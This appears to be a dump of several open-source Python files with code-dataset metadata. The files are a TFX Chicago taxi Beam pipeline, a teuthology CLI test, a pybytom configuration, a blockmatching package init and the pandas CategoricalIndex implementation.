            'value': value if value else self.text,
        })
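# Usage sketch (illustrative only; the form and field names are
# hypothetical): InfoField renders static read-only text inside an otherwise
# normal Django form.
class ExampleInfoForm(forms.Form):
    notice = InfoField(required=False, text="This section is read-only.")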
| avg_line_length: 26.577778 | max_line_length: 56 | alphanum_fraction: 0.600334 |
hexsha: 2493337ebc51aabe861c2cb13697be06ff98df3a | size: 9,846 | ext: py | lang: Python
repo_path: tfx/examples/chicago_taxi_pipeline/taxi_pipeline_beam.py | repo_name: RossKohler/tfx | head_hexsha: ce2fd6fbde9845cd837c47089c3d6db2f87007b9 | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null |
# Lint as: python2, python3
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Chicago taxi example using TFX."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import socket
import sys
from typing import List, Text
import absl
from absl.flags import argparse_flags
import tensorflow_model_analysis as tfma
from tfx.components import CsvExampleGen
from tfx.components import Evaluator
from tfx.components import ExampleValidator
from tfx.components import Pusher
from tfx.components import ResolverNode
from tfx.components import SchemaGen
from tfx.components import StatisticsGen
from tfx.components import Trainer
from tfx.components import Transform
from tfx.components.trainer.executor import Executor
from tfx.dsl.components.base import executor_spec
from tfx.dsl.experimental import latest_blessed_model_resolver
from tfx.orchestration import metadata
from tfx.orchestration import pipeline
from tfx.orchestration.beam.beam_dag_runner import BeamDagRunner
from tfx.proto import pusher_pb2
from tfx.proto import trainer_pb2
from tfx.types import Channel
from tfx.types.standard_artifacts import Model
from tfx.types.standard_artifacts import ModelBlessing
_pipeline_name = 'chicago_taxi_beam'
# This example assumes that the taxi data is stored in ~/taxi/data and the
# taxi utility function is in ~/taxi. Feel free to customize this as needed.
_taxi_root = os.path.join(os.environ['HOME'], 'taxi')
_data_root = os.path.join(_taxi_root, 'data', 'simple')
# Python module file to inject customized logic into the TFX components. The
# Transform and Trainer both require user-defined functions to run successfully.
_module_file = os.path.join(_taxi_root, 'taxi_utils.py')
# Path which can be listened to by the model server. Pusher will output the
# trained model here.
_serving_model_dir = os.path.join(_taxi_root, 'serving_model', _pipeline_name)
# Directory and data locations. This example assumes all of the chicago taxi
# example code and metadata library is relative to $HOME, but you can store
# these files anywhere on your local filesystem.
_tfx_root = os.path.join(os.environ['HOME'], 'tfx')
_pipeline_root = os.path.join(_tfx_root, 'pipelines', _pipeline_name)
# Sqlite ML-metadata db path.
_metadata_path = os.path.join(_tfx_root, 'metadata', _pipeline_name,
'metadata.db')
# LINT.IfChange
try:
_parallelism = multiprocessing.cpu_count()
except NotImplementedError:
_parallelism = 1
# LINT.ThenChange(setup/setup_beam_on_flink.sh)
# Common pipeline arguments used by both Flink and Spark runners.
_beam_portable_pipeline_args = [
# The runner will instruct the original Python process to start Beam Python
# workers.
'--environment_type=LOOPBACK',
# Start Beam Python workers as separate processes as opposed to threads.
'--experiments=use_loopback_process_worker=True',
'--sdk_worker_parallelism=%d' % _parallelism,
# Setting environment_cache_millis to practically infinity enables
# continual reuse of Beam SDK workers, improving performance.
'--environment_cache_millis=1000000',
# TODO(b/183057237): Obviate setting this.
'--experiments=pre_optimize=all',
]
# Pipeline arguments for Beam powered Components.
# Arguments differ according to runner.
_beam_pipeline_args_by_runner = {
'DirectRunner': [
'--direct_running_mode=multi_processing',
        # 0 means auto-detect based on the number of CPUs available
# during execution time.
'--direct_num_workers=0',
],
'SparkRunner': [
'--runner=SparkRunner',
'--spark_submit_uber_jar',
'--spark_rest_url=http://%s:6066' % socket.gethostname(),
] + _beam_portable_pipeline_args,
'FlinkRunner': [
'--runner=FlinkRunner',
# LINT.IfChange
'--flink_version=1.12',
# LINT.ThenChange(setup/setup_beam_on_flink.sh)
'--flink_submit_uber_jar',
'--flink_master=http://localhost:8081',
'--parallelism=%d' % _parallelism,
] + _beam_portable_pipeline_args
}
# TODO(b/137289334): rename this as simple after DAG visualization is done.
def _create_pipeline(pipeline_name: Text, pipeline_root: Text, data_root: Text,
module_file: Text, serving_model_dir: Text,
metadata_path: Text,
beam_pipeline_args: List[Text]) -> pipeline.Pipeline:
"""Implements the chicago taxi pipeline with TFX."""
# Brings data into the pipeline or otherwise joins/converts training data.
example_gen = CsvExampleGen(input_base=data_root)
# Computes statistics over data for visualization and example validation.
statistics_gen = StatisticsGen(examples=example_gen.outputs['examples'])
# Generates schema based on statistics files.
schema_gen = SchemaGen(
statistics=statistics_gen.outputs['statistics'],
infer_feature_shape=False)
# Performs anomaly detection based on statistics and data schema.
example_validator = ExampleValidator(
statistics=statistics_gen.outputs['statistics'],
schema=schema_gen.outputs['schema'])
# Performs transformations and feature engineering in training and serving.
transform = Transform(
examples=example_gen.outputs['examples'],
schema=schema_gen.outputs['schema'],
module_file=module_file)
# Uses user-provided Python function that implements a model using TF-Learn.
trainer = Trainer(
module_file=module_file,
custom_executor_spec=executor_spec.ExecutorClassSpec(Executor),
transformed_examples=transform.outputs['transformed_examples'],
schema=schema_gen.outputs['schema'],
transform_graph=transform.outputs['transform_graph'],
train_args=trainer_pb2.TrainArgs(num_steps=10000),
eval_args=trainer_pb2.EvalArgs(num_steps=5000))
# Get the latest blessed model for model validation.
model_resolver = ResolverNode(
instance_name='latest_blessed_model_resolver',
resolver_class=latest_blessed_model_resolver.LatestBlessedModelResolver,
model=Channel(type=Model),
model_blessing=Channel(type=ModelBlessing))
  # Uses TFMA to compute evaluation statistics over features of a model and
# perform quality validation of a candidate model (compared to a baseline).
eval_config = tfma.EvalConfig(
model_specs=[tfma.ModelSpec(signature_name='eval')],
slicing_specs=[
tfma.SlicingSpec(),
tfma.SlicingSpec(feature_keys=['trip_start_hour'])
],
metrics_specs=[
tfma.MetricsSpec(
thresholds={
'accuracy':
tfma.config.MetricThreshold(
value_threshold=tfma.GenericValueThreshold(
lower_bound={'value': 0.6}),
# Change threshold will be ignored if there is no
# baseline model resolved from MLMD (first run).
change_threshold=tfma.GenericChangeThreshold(
direction=tfma.MetricDirection.HIGHER_IS_BETTER,
absolute={'value': -1e-10}))
})
])
evaluator = Evaluator(
examples=example_gen.outputs['examples'],
model=trainer.outputs['model'],
baseline_model=model_resolver.outputs['model'],
eval_config=eval_config)
# Checks whether the model passed the validation steps and pushes the model
# to a file destination if check passed.
pusher = Pusher(
model=trainer.outputs['model'],
model_blessing=evaluator.outputs['blessing'],
push_destination=pusher_pb2.PushDestination(
filesystem=pusher_pb2.PushDestination.Filesystem(
base_directory=serving_model_dir)))
return pipeline.Pipeline(
pipeline_name=pipeline_name,
pipeline_root=pipeline_root,
components=[
example_gen,
statistics_gen,
schema_gen,
example_validator,
transform,
trainer,
model_resolver,
evaluator,
pusher,
],
enable_cache=True,
metadata_connection_config=metadata.sqlite_metadata_connection_config(
metadata_path),
beam_pipeline_args=beam_pipeline_args)
# To run this pipeline from the python CLI:
# $python taxi_pipeline_beam.py
if __name__ == '__main__':
absl.logging.set_verbosity(absl.logging.INFO)
parser = argparse_flags.ArgumentParser()
parser.add_argument(
'--runner',
type=str,
default='DirectRunner',
choices=['DirectRunner', 'FlinkRunner', 'SparkRunner'],
help='The Beam runner to execute Beam-powered components. '
'For FlinkRunner or SparkRunner, first run setup/setup_beam_on_flink.sh '
'or setup/setup_beam_on_spark.sh, respectively.')
parsed_args, _ = parser.parse_known_args(sys.argv)
BeamDagRunner().run(
_create_pipeline(
pipeline_name=_pipeline_name,
pipeline_root=_pipeline_root,
data_root=_data_root,
module_file=_module_file,
serving_model_dir=_serving_model_dir,
metadata_path=_metadata_path,
beam_pipeline_args=_beam_pipeline_args_by_runner[parsed_args.runner]))
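# Invocation sketch (illustrative only): the --runner flag selects the
# matching entry in _beam_pipeline_args_by_runner defined above.
#
#   python taxi_pipeline_beam.py                        # DirectRunner (default)
#   python taxi_pipeline_beam.py --runner=FlinkRunner   # after setup/setup_beam_on_flink.sh
#   python taxi_pipeline_beam.py --runner=SparkRunner   # after setup/setup_beam_on_spark.sh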
| avg_line_length: 39.227092 | max_line_length: 80 | alphanum_fraction: 0.719582 |
hexsha: db88f8f5eef5e7b446bbdd942fb55061b6854e8a | size: 466 | ext: py | lang: Python
repo_path: scripts/test/script.py | repo_name: grapheo12/teuthology | head_hexsha: f69547410d113fea9811e5a002cc7a4689cffdbb | licenses: ["MIT"]
stars: null | issues: null | forks: null |
import subprocess
from pytest import raises
from six import ensure_str
class Script(object):
script_name = 'teuthology'
def test_help(self):
args = (self.script_name, '--help')
out = ensure_str(subprocess.check_output(args))
assert out.startswith('usage')
def test_invalid(self):
args = (self.script_name, '--invalid-option')
with raises(subprocess.CalledProcessError):
subprocess.check_call(args)
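# Hypothetical subclass sketch (illustrative only): the same two checks are
# reused for another console script simply by overriding script_name.
class TestTeuthologyLock(Script):
    script_name = 'teuthology-lock'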
| avg_line_length: 25.888889 | max_line_length: 55 | alphanum_fraction: 0.67382 |
hexsha: ffaf8ac9b1bfc643b2af209136c94f46987c706a | size: 26 | ext: py | lang: Python
repo_path: python/testData/intentions/PyConvertToFStringIntentionTest/percentOperatorSimpleTuple_after.py | repo_name: truthiswill/intellij-community | head_hexsha: fff88cfb0dc168eea18ecb745d3e5b93f57b0b95 | licenses: ["Apache-2.0"]
stars: 2 [2019-04-28T07:48:50.000Z to 2020-12-11T14:18:08.000Z] | issues: 173 [2018-07-05T13:59:39.000Z to 2018-08-09T01:12:03.000Z] | forks: 2 [2020-03-15T08:57:37.000Z to 2020-04-07T04:48:14.000Z] |
f'{"foo"} {42:d} {2.5:f}'
| avg_line_length: 13 | max_line_length: 25 | alphanum_fraction: 0.384615 |
hexsha: 02637f26123cec7f323a52af26eb92195fc0fe31 | size: 1,986 | ext: py | lang: Python
repo_path: pybytom/config.py | repo_name: meherett/btmhdw | head_hexsha: 6929750edb7747a9937806272127c98db86e4c98 | licenses: ["MIT"]
stars: 3 [2019-06-02T06:31:06.000Z to 2019-06-16T20:46:38.000Z] | issues: 3 [2020-09-10T04:40:58.000Z to 2021-06-25T15:38:35.000Z] | forks: 1 [2020-08-11T07:48:19.000Z to 2020-08-11T07:48:19.000Z] |
#!/usr/bin/env python3
from .assets import BTM as ASSET
# Bytom mainchain & sidechain configuration
config: dict = {
"mainchain": {
"mainnet": {
"bytom-core": "http://localhost:9888",
"blockmeta": "https://blockmeta.com/api/v3",
"blockcenter": "https://bcapi.bystack.com/bytom/v3",
"mov": "https://ex.movapi.com/bytom/v3"
},
"solonet": {
"bytom-core": "http://localhost:9888",
"blockmeta": None,
"blockcenter": None,
"mov": None
},
"testnet": {
"bytom-core": "http://localhost:9888",
"blockmeta": None,
"blockcenter": None,
"mov": None
}
},
"sidechain": {
"mainnet": {
"vapor-core": "http://localhost:9889",
"blockmeta": "https://vapor.blockmeta.com/api/v1",
"blockcenter": "https://bcapi.bystack.com/vapor/v3",
"mov": "https://ex.movapi.com/vapor/v3"
},
"solonet": {
"vapor-core": "http://localhost:9889",
"blockmeta": None,
"blockcenter": None,
"mov": None
},
"testnet": {
"vapor-core": "http://localhost:9889",
"blockmeta": None,
"blockcenter": None,
"mov": None
}
},
"harden": 0x80000000,
"vapor": False,
"network": "mainnet",
"timeout": 60,
"asset": ASSET,
"symbols": {
"BTM": 1,
"mBTM": 1000,
"NEU": 100_000_000
},
"path": "m/44/153/1/0/1",
"BIP44": "m/44/153/{account}/{change}/{address}",
"indexes": ["2c000000", "99000000", "01000000", "00000000", "01000000"],
"fee": 10_000_000,
"confirmations": 1,
"forbid_chain_tx": False,
"headers": {
"User-Agent": "PyBytom User Agent v0.1.0",
"Content-Type": "application/json; charset=utf-8",
"Accept": "application/json"
}
}
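# Usage sketch (illustrative only; the variable names below are
# hypothetical). Keys mirror the dict defined above:
blockmeta_api = config["mainchain"]["mainnet"]["blockmeta"]
amount_in_neu = 2 * config["symbols"]["NEU"]  # 2 BTM expressed in NEU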
| avg_line_length: 28.371429 | max_line_length: 76 | alphanum_fraction: 0.484894 |
hexsha: a2f6fa32ca1a3f678b9591c6ba489729ebfbc30e | size: 1,529 | ext: py | lang: Python
repo_path: src/blockmatching/__init__.py | repo_name: duducosmos/blockmatching | head_hexsha: c37949cce79b58ae658d5814ba3cff906dc4ab4e | licenses: ["Apache-2.0"]
stars: 1 [2021-05-17T09:20:05.000Z to 2021-05-17T09:20:05.000Z] | issues: null | forks: 3 [2020-11-25T04:06:16.000Z to 2022-01-21T16:36:16.000Z] |
#!/usr/bin/env python3.6
# -*- Coding: UTF-8 -*-
"""
Block matching algorithm to estimate optical flow and detect moving
objects.
According to [cuevs2013]_ in a block matching (BM) approach:
'''...image frames in a video sequence are divided into blocks. For each
block in the current frame, the best matching block is identified inside a
region of the previous frame, aiming to minimize the sum of absolute
differences...'''
License
-------
Developed by: E. S. Pereira.
e-mail: pereira.somoza@gmail.com
Copyright [2019] [E. S. Pereira]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
References
----------
.. [cuevs2013] CUEVAS, Erik et al. Block matching algorithm for motion
estimation based on Artificial Bee Colony (ABC).
Applied Soft Computing, v. 13, n. 6, p. 3047-3059, 2013.
"""
from .blockmatching import *
from .clustering import *
from .vectormask import *
from .background import *
from .motionlayers import *
from .dlayers import *
from .savevideo import *
from .forecast import *
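# Illustrative sketch of the sum-of-absolute-differences matching criterion
# described in the docstring above. This helper is NOT part of the package
# API; it only demonstrates the idea behind block matching.
import numpy as np
def _sad_best_match(block, search_region):
    """Return the (row, col) offset in search_region minimizing the SAD."""
    block = block.astype(np.int64)  # avoid unsigned wrap-around
    bh, bw = block.shape
    best, best_pos = np.inf, (0, 0)
    for i in range(search_region.shape[0] - bh + 1):
        for j in range(search_region.shape[1] - bw + 1):
            window = search_region[i:i + bh, j:j + bw].astype(np.int64)
            sad = np.abs(window - block).sum()
            if sad < best:
                best, best_pos = sad, (i, j)
    return best_pos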
| avg_line_length: 30.58 | max_line_length: 78 | alphanum_fraction: 0.730543 |
hexsha: b5089621313b8bff9504de6e3c5dbb30a9b0954c | size: 21,383 | ext: py | lang: Python
repo_path: pandas/core/indexes/category.py | repo_name: gancho-ivanov/pandas | head_hexsha: 3cbbb96f0514f872bbf154f1ed418c7aa7300e9e | licenses: ["PSF-2.0", "Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "MIT", "ECL-2.0", "BSD-3-Clause"]
stars: null | issues: null | forks: null |
from __future__ import annotations
from typing import (
Any,
Hashable,
)
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import index as libindex
from pandas._libs.lib import no_default
from pandas._typing import (
ArrayLike,
Dtype,
DtypeObj,
)
from pandas.util._decorators import (
Appender,
doc,
)
from pandas.core.dtypes.common import (
ensure_platform_int,
is_categorical_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
is_valid_na_for_dtype,
isna,
notna,
)
from pandas.core import accessor
from pandas.core.arrays.categorical import (
Categorical,
contains,
)
from pandas.core.construction import extract_array
import pandas.core.indexes.base as ibase
from pandas.core.indexes.base import (
Index,
_index_shared_docs,
maybe_extract_name,
)
from pandas.core.indexes.extension import (
NDArrayBackedExtensionIndex,
inherit_names,
)
_index_doc_kwargs: dict[str, str] = dict(ibase._index_doc_kwargs)
_index_doc_kwargs.update({"target_klass": "CategoricalIndex"})
@inherit_names(
[
"argsort",
"_internal_get_values",
"tolist",
"codes",
"categories",
"ordered",
"_reverse_indexer",
"searchsorted",
"is_dtype_equal",
"min",
"max",
],
Categorical,
)
@accessor.delegate_names(
delegate=Categorical,
accessors=[
"rename_categories",
"reorder_categories",
"add_categories",
"remove_categories",
"remove_unused_categories",
"set_categories",
"as_ordered",
"as_unordered",
],
typ="method",
overwrite=True,
)
class CategoricalIndex(NDArrayBackedExtensionIndex, accessor.PandasDelegate):
"""
Index based on an underlying :class:`Categorical`.
CategoricalIndex, like Categorical, can only take on a limited,
and usually fixed, number of possible values (`categories`). Also,
like Categorical, it might have an order, but numerical operations
(additions, divisions, ...) are not possible.
Parameters
----------
data : array-like (1-dimensional)
The values of the categorical. If `categories` are given, values not in
`categories` will be replaced with NaN.
categories : index-like, optional
The categories for the categorical. Items need to be unique.
If the categories are not given here (and also not in `dtype`), they
will be inferred from the `data`.
ordered : bool, optional
Whether or not this categorical is treated as an ordered
categorical. If not given here or in `dtype`, the resulting
categorical will be unordered.
dtype : CategoricalDtype or "category", optional
If :class:`CategoricalDtype`, cannot be used together with
`categories` or `ordered`.
copy : bool, default False
Make a copy of input ndarray.
name : object, optional
Name to be stored in the index.
Attributes
----------
codes
categories
ordered
Methods
-------
rename_categories
reorder_categories
add_categories
remove_categories
remove_unused_categories
set_categories
as_ordered
as_unordered
map
Raises
------
ValueError
If the categories do not validate.
TypeError
If an explicit ``ordered=True`` is given but no `categories` and the
`values` are not sortable.
See Also
--------
Index : The base pandas Index type.
Categorical : A categorical array.
CategoricalDtype : Type for categorical data.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/user_guide/advanced.html#categoricalindex>`__
for more.
Examples
--------
>>> pd.CategoricalIndex(["a", "b", "c", "a", "b", "c"])
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['a', 'b', 'c'], ordered=False, dtype='category')
``CategoricalIndex`` can also be instantiated from a ``Categorical``:
>>> c = pd.Categorical(["a", "b", "c", "a", "b", "c"])
>>> pd.CategoricalIndex(c)
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['a', 'b', 'c'], ordered=False, dtype='category')
Ordered ``CategoricalIndex`` can have a min and max value.
>>> ci = pd.CategoricalIndex(
... ["a", "b", "c", "a", "b", "c"], ordered=True, categories=["c", "b", "a"]
... )
>>> ci
CategoricalIndex(['a', 'b', 'c', 'a', 'b', 'c'],
categories=['c', 'b', 'a'], ordered=True, dtype='category')
>>> ci.min()
'c'
"""
_typ = "categoricalindex"
_data_cls = Categorical
@property
def _can_hold_strings(self):
return self.categories._can_hold_strings
codes: np.ndarray
categories: Index
_data: Categorical
_values: Categorical
@property
def _engine_type(self):
# self.codes can have dtype int8, int16, int32 or int64, so we need
# to return the corresponding engine type (libindex.Int8Engine, etc.).
# error: Invalid index type "Type[generic]" for "Dict[Type[signedinteger[Any]],
# Any]"; expected type "Type[signedinteger[Any]]"
return {
np.int8: libindex.Int8Engine,
np.int16: libindex.Int16Engine,
np.int32: libindex.Int32Engine,
np.int64: libindex.Int64Engine,
}[
self.codes.dtype.type # type: ignore[index]
]
_attributes = ["name"]
# --------------------------------------------------------------------
# Constructors
def __new__(
cls,
data=None,
categories=None,
ordered=None,
dtype: Dtype | None = None,
copy: bool = False,
name: Hashable = None,
) -> CategoricalIndex:
name = maybe_extract_name(name, data, cls)
if is_scalar(data):
raise cls._scalar_data_error(data)
data = Categorical(
data, categories=categories, ordered=ordered, dtype=dtype, copy=copy
)
return cls._simple_new(data, name=name)
# --------------------------------------------------------------------
@doc(Index._shallow_copy)
def _shallow_copy(
self,
values: Categorical,
name: Hashable = no_default,
) -> CategoricalIndex:
name = self._name if name is no_default else name
if values is not None:
# In tests we only get here with Categorical objects that
# have matching .ordered, and values.categories a subset of
# our own. However we do _not_ have a dtype match in general.
values = Categorical(values, dtype=self.dtype)
return super()._shallow_copy(values=values, name=name)
def _is_dtype_compat(self, other) -> Categorical:
"""
*this is an internal non-public method*
provide a comparison between the dtype of self and other (coercing if
needed)
Parameters
----------
other : Index
Returns
-------
Categorical
Raises
------
TypeError if the dtypes are not compatible
"""
if is_categorical_dtype(other):
other = extract_array(other)
if not other._categories_match_up_to_permutation(self):
raise TypeError(
"categories must match existing categories when appending"
)
else:
values = other
cat = Categorical(other, dtype=self.dtype)
other = CategoricalIndex(cat)
if not other.isin(values).all():
raise TypeError(
"cannot append a non-category item to a CategoricalIndex"
)
other = other._values
if not ((other == values) | (isna(other) & isna(values))).all():
# GH#37667 see test_equals_non_category
raise TypeError(
"categories must match existing categories when appending"
)
return other
def equals(self, other: object) -> bool:
"""
Determine if two CategoricalIndex objects contain the same elements.
Returns
-------
bool
            True if the two CategoricalIndex objects contain the same
            elements, otherwise False.
"""
if self.is_(other):
return True
if not isinstance(other, Index):
return False
try:
other = self._is_dtype_compat(other)
except (TypeError, ValueError):
return False
return self._data.equals(other)
# --------------------------------------------------------------------
# Rendering Methods
@property
def _formatter_func(self):
return self.categories._formatter_func
def _format_attrs(self):
"""
Return a list of tuples of the (attr,formatted_value)
"""
max_categories = (
10
if get_option("display.max_categories") == 0
else get_option("display.max_categories")
)
attrs = [
(
"categories",
ibase.default_pprint(self.categories, max_seq_items=max_categories),
),
# error: "CategoricalIndex" has no attribute "ordered"
("ordered", self.ordered), # type: ignore[attr-defined]
]
if self.name is not None:
attrs.append(("name", ibase.default_pprint(self.name)))
attrs.append(("dtype", f"'{self.dtype.name}'"))
max_seq_items = get_option("display.max_seq_items") or len(self)
if len(self) > max_seq_items:
attrs.append(("length", len(self)))
return attrs
def _format_with_header(self, header: list[str], na_rep: str = "NaN") -> list[str]:
from pandas.io.formats.printing import pprint_thing
result = [
pprint_thing(x, escape_chars=("\t", "\r", "\n")) if notna(x) else na_rep
for x in self._values
]
return header + result
# --------------------------------------------------------------------
@property
def inferred_type(self) -> str:
return "categorical"
@doc(Index.__contains__)
def __contains__(self, key: Any) -> bool:
# if key is a NaN, check if any NaN is in self.
if is_valid_na_for_dtype(key, self.categories.dtype):
return self.hasnans
return contains(self, key, container=self._engine)
@doc(Index.fillna)
def fillna(self, value, downcast=None):
value = self._require_scalar(value)
try:
cat = self._data.fillna(value)
except (ValueError, TypeError):
# invalid fill_value
if not self.isna().any():
# nothing to fill, we can get away without casting
return self.copy()
return self.astype(object).fillna(value, downcast=downcast)
return type(self)._simple_new(cat, name=self.name)
@doc(Index.unique)
def unique(self, level=None):
if level is not None:
self._validate_index_level(level)
result = self._values.unique()
# Use _simple_new instead of _shallow_copy to ensure we keep dtype
# of result, not self.
return type(self)._simple_new(result, name=self.name)
def reindex(self, target, method=None, level=None, limit=None, tolerance=None):
"""
Create index with target's values (move/add/delete values as necessary)
Returns
-------
new_index : pd.Index
Resulting index
indexer : np.ndarray or None
Indices of output values in original index
"""
if method is not None:
raise NotImplementedError(
"argument method is not implemented for CategoricalIndex.reindex"
)
if level is not None:
raise NotImplementedError(
"argument level is not implemented for CategoricalIndex.reindex"
)
if limit is not None:
raise NotImplementedError(
"argument limit is not implemented for CategoricalIndex.reindex"
)
target = ibase.ensure_index(target)
if self.equals(target):
indexer = None
missing = np.array([], dtype=np.intp)
else:
indexer, missing = self.get_indexer_non_unique(np.array(target))
if len(self.codes) and indexer is not None:
new_target = self.take(indexer)
else:
new_target = target
# filling in missing if needed
if len(missing):
cats = self.categories.get_indexer(target)
if not isinstance(cats, CategoricalIndex) or (cats == -1).any():
# coerce to a regular index here!
result = Index(np.array(self), name=self.name)
new_target, indexer, _ = result._reindex_non_unique(np.array(target))
else:
codes = new_target.codes.copy()
codes[indexer == -1] = cats[missing]
cat = self._data._from_backing_data(codes)
new_target = type(self)._simple_new(cat, name=self.name)
# we always want to return an Index type here
# to be consistent with .reindex for other index types (e.g. they don't
# coerce based on the actual values, only on the dtype)
# unless we had an initial Categorical to begin with
# in which case we are going to conform to the passed Categorical
new_target = np.asarray(new_target)
if is_categorical_dtype(target):
new_target = Categorical(new_target, dtype=target.dtype)
new_target = type(self)._simple_new(new_target, name=self.name)
else:
new_target = Index(new_target, name=self.name)
return new_target, indexer
def _reindex_non_unique(self, target):
"""
        Reindex from a non-unique index; CategoricalIndexes are almost
        always non-unique.
"""
new_target, indexer = self.reindex(target)
new_indexer = None
check = indexer == -1
if check.any():
new_indexer = np.arange(len(self.take(indexer)))
new_indexer[check] = -1
cats = self.categories.get_indexer(target)
if not (cats == -1).any():
# .reindex returns normal Index. Revert to CategoricalIndex if
# all targets are included in my categories
new_target = Categorical(new_target, dtype=self.dtype)
new_target = type(self)._simple_new(new_target, name=self.name)
return new_target, indexer, new_indexer
# --------------------------------------------------------------------
# Indexing Methods
def _maybe_cast_indexer(self, key) -> int:
return self._data._unbox_scalar(key)
def _get_indexer(
self,
target: Index,
method: str | None = None,
limit: int | None = None,
tolerance=None,
) -> np.ndarray:
if self.equals(target):
return np.arange(len(self), dtype="intp")
return self._get_indexer_non_unique(target._values)[0]
@Appender(_index_shared_docs["get_indexer_non_unique"] % _index_doc_kwargs)
def get_indexer_non_unique(self, target):
target = ibase.ensure_index(target)
return self._get_indexer_non_unique(target._values)
def _get_indexer_non_unique(self, values: ArrayLike):
"""
        get_indexer_non_unique but after unwrapping the target Index object.
"""
# Note: we use engine.get_indexer_non_unique for get_indexer in addition
# to get_indexer_non_unique because, even if `target` is unique, any
# non-category entries in it will be encoded as -1 so `codes` may
# not be unique.
if isinstance(values, Categorical):
# Indexing on codes is more efficient if categories are the same,
# so we can apply some optimizations based on the degree of
# dtype-matching.
cat = self._data._encode_with_my_categories(values)
codes = cat._codes
else:
codes = self.categories.get_indexer(values)
indexer, missing = self._engine.get_indexer_non_unique(codes)
return ensure_platform_int(indexer), missing
@doc(Index._convert_list_indexer)
def _convert_list_indexer(self, keyarr):
# Return our indexer or raise if all of the values are not included in
# the categories
if self.categories._defer_to_indexing:
# See tests.indexing.interval.test_interval:test_loc_getitem_frame
indexer = self.categories._convert_list_indexer(keyarr)
return Index(self.codes).get_indexer_for(indexer)
return self.get_indexer_for(keyarr)
# --------------------------------------------------------------------
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
return self.categories._is_comparable_dtype(dtype)
def take_nd(self, *args, **kwargs):
"""Alias for `take`"""
warnings.warn(
"CategoricalIndex.take_nd is deprecated, use CategoricalIndex.take instead",
FutureWarning,
stacklevel=2,
)
return self.take(*args, **kwargs)
def map(self, mapper):
"""
Map values using input correspondence (a dict, Series, or function).
Maps the values (their categories, not the codes) of the index to new
categories. If the mapping correspondence is one-to-one the result is a
:class:`~pandas.CategoricalIndex` which has the same order property as
the original, otherwise an :class:`~pandas.Index` is returned.
If a `dict` or :class:`~pandas.Series` is used any unmapped category is
mapped to `NaN`. Note that if this happens an :class:`~pandas.Index`
will be returned.
Parameters
----------
mapper : function, dict, or Series
Mapping correspondence.
Returns
-------
pandas.CategoricalIndex or pandas.Index
Mapped index.
See Also
--------
Index.map : Apply a mapping correspondence on an
:class:`~pandas.Index`.
Series.map : Apply a mapping correspondence on a
:class:`~pandas.Series`.
Series.apply : Apply more complex functions on a
:class:`~pandas.Series`.
Examples
--------
>>> idx = pd.CategoricalIndex(['a', 'b', 'c'])
>>> idx
CategoricalIndex(['a', 'b', 'c'], categories=['a', 'b', 'c'],
ordered=False, dtype='category')
>>> idx.map(lambda x: x.upper())
CategoricalIndex(['A', 'B', 'C'], categories=['A', 'B', 'C'],
ordered=False, dtype='category')
>>> idx.map({'a': 'first', 'b': 'second', 'c': 'third'})
CategoricalIndex(['first', 'second', 'third'], categories=['first',
'second', 'third'], ordered=False, dtype='category')
If the mapping is one-to-one the ordering of the categories is
preserved:
>>> idx = pd.CategoricalIndex(['a', 'b', 'c'], ordered=True)
>>> idx
CategoricalIndex(['a', 'b', 'c'], categories=['a', 'b', 'c'],
ordered=True, dtype='category')
>>> idx.map({'a': 3, 'b': 2, 'c': 1})
CategoricalIndex([3, 2, 1], categories=[3, 2, 1], ordered=True,
dtype='category')
If the mapping is not one-to-one an :class:`~pandas.Index` is returned:
>>> idx.map({'a': 'first', 'b': 'second', 'c': 'first'})
Index(['first', 'second', 'first'], dtype='object')
If a `dict` is used, all unmapped categories are mapped to `NaN` and
the result is an :class:`~pandas.Index`:
>>> idx.map({'a': 'first', 'b': 'second'})
Index(['first', 'second', nan], dtype='object')
"""
mapped = self._values.map(mapper)
return Index(mapped, name=self.name)
def _concat(self, to_concat: list[Index], name: Hashable) -> Index:
# if calling index is category, don't check dtype of others
try:
codes = np.concatenate([self._is_dtype_compat(c).codes for c in to_concat])
except TypeError:
# not all to_concat elements are among our categories (or NA)
from pandas.core.dtypes.concat import concat_compat
res = concat_compat(to_concat)
return Index(res, name=name)
else:
cat = self._data._from_backing_data(codes)
return type(self)._simple_new(cat, name=name)
def _delegate_method(self, name: str, *args, **kwargs):
""" method delegation to the ._values """
method = getattr(self._values, name)
if "inplace" in kwargs:
raise ValueError("cannot use inplace with CategoricalIndex")
res = method(*args, **kwargs)
if is_scalar(res):
return res
return CategoricalIndex(res, name=self.name)
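# Behavior sketch (illustrative only, doctest-style): appending values that
# are not among the categories trips the TypeError in _is_dtype_compat, so
# _concat falls back to concat_compat and a plain object-dtype Index:
#
#   >>> ci = pd.CategoricalIndex(["a", "b"], categories=["a", "b"])
#   >>> ci.append(pd.Index(["z"]))
#   Index(['a', 'b', 'z'], dtype='object')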
| avg_line_length: 32.84639 | max_line_length: 95 | alphanum_fraction: 0.583454 |
hexsha: 51c1bc127a4c49546336b970148e389031dc5f1c | size: 3,020 | ext: py | lang: Python
